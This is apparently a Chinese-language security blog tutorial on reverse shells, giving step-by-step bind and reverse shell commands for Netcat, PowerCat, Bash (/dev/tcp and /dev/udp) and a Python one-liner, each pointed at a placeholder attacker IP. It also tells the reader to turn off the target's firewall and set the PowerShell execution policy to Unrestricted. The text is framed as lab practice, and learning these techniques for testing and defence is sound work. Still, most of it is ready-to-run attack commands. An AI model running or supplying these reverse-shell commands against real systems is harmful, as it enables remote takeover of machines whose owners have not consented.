内网安全:反弹shell

目录

一.Netcat反弹Shell

二.PowerCat反弹Shell

PowerCat和nc正向连接

PowerCat和nc反向连接

PowerCat和PowerCat反向连接

三.Bash反弹shell

[四.Python 反弹Shell](#四.Python 反弹Shell)


一.Netcat反弹Shell

在Windows容易被杀

介绍:

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,常用参数如下
注意:这里需要关闭靶机的防火墙,做NC反弹的时候,前提你也经控制了对方电脑

正向反弹:

场景:攻击机器和靶机都是在公网上,都能互ping,这个时候可以用正向反弾

利用:

1.在靶机上运行:

nc -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器

nc -lvvp 1111 -e /bin/bash linux机器

这里以Linux作演示

2在攻击机上运行:

nc -v 靶机IP 1111

3.拿到shell

反向反弹:

实验前提:

攻击机器在公网上,靶机在内网里面,这时候需要靶机反向链接攻击机器,也就是反向反弹

利用:

1在攻击者机器运行:

nc -lvvp 1111 监听1111端口

2.在靶机上运行 (反弹到公网)

nc -e C:\Windows\System32\cmd.exe 攻击IP 1111 windos机器

nc -e /bin/bash 攻击IP 1111 linux机器

这里用Linux作演示

3.拿到反向的shell

二.PowerCat反弹Shell

和NC作用一样,只能用于Windows

介绍:可以无文件落地

PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。

利用:

1.导入模块:

Import-Module .\powercat.ps1

如果提示未能加载指定模块,则可能是权限问题,输入如下代码

Set-ExecutionPolicy Unrestricted

PowerCat和nc正向连接

1、靶机使用powercat执行以下命令:

powercat -l -p 8080 -e cmd.exe -v

2、攻击机使用nc执行以下命令:

nc -v 靶机IP 8080 -vv

3.成功反弹

PowerCat和nc反向连接

1、靶机使用powercat执行以下命令

powercat -c 攻击机IP -p 8888 -v -e cmd.exe

2、攻击机使用nc执行以下命令:

nc -l -p 8888 -vv

3.成功反弹

PowerCat和PowerCat反向连接

1、靶机使用powercat执行以下命令:

powercat -c 攻击机器IP -p 9999 -v -ep

2、攻击机使用powercat执行以下命令:

powercat -l -p 9999 -v

3.成功反弹

三.Bash反弹shell

介绍:传输层的隧道

** Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell**
** Bash 反弹Shell的命令如下:**

bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1

bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2

bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1

bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2

利用:

1、攻击机器使用nc执行监听命令**

nc -lvvp 9999 监听 TCP

nc -lup 9999 监听UDP (UDP不稳定)

2、实验靶机执行连接命令

bash -i >&/dev/tcp/攻击机器IP/9999 0>&1

3.成功反弹

四.Python 反弹Shell

利用:

1、攻击机器使用nc执行监听命令

nc -lvvp 1111 监听 TCP

2、实验靶机执行连接命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机器IP",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

3.成功反弹

相关推荐
byoass1 小时前
企业云盘与设计软件深度集成:AutoCAD/Revit/SolidWorks插件开发与API集成实战
服务器·网络·数据库·安全·oracle·云计算
Fullde福德负载箱厂家2 小时前
负载箱的需求分析与规格编制:用户应知的采购前期技术准备
安全·制造
ReaF_star2 小时前
【安全】SSL证书更新操作手册(Nginx+Cloudflare+acme.sh)
nginx·安全·ssl
盟接之桥3 小时前
什么是EDI(电子数据交换)|制造业场景解决方案
大数据·网络·安全·汽车·制造
科技云报道3 小时前
安全进入“AI自主攻击”时代,瑞数信息如何用AI对抗AI
人工智能·安全
KnowSafe5 小时前
证书自动化解决方案哪家更可靠?
运维·服务器·安全·https·自动化·ssl
KnowSafe5 小时前
2026年证书自动化解决方案选型指南
运维·安全·自动化·ssl·itrustssl
b55t4ck5 小时前
FortiWeb CVE-2025-64446漏洞深入复现分析
网络·安全·iot
wanhengidc5 小时前
可持续性 云手机运行
运维·服务器·网络·安全·智能手机
txg6666 小时前
VulCNN:多视图图表征驱动的可扩展漏洞检测体系
人工智能·深度学习·安全·网络安全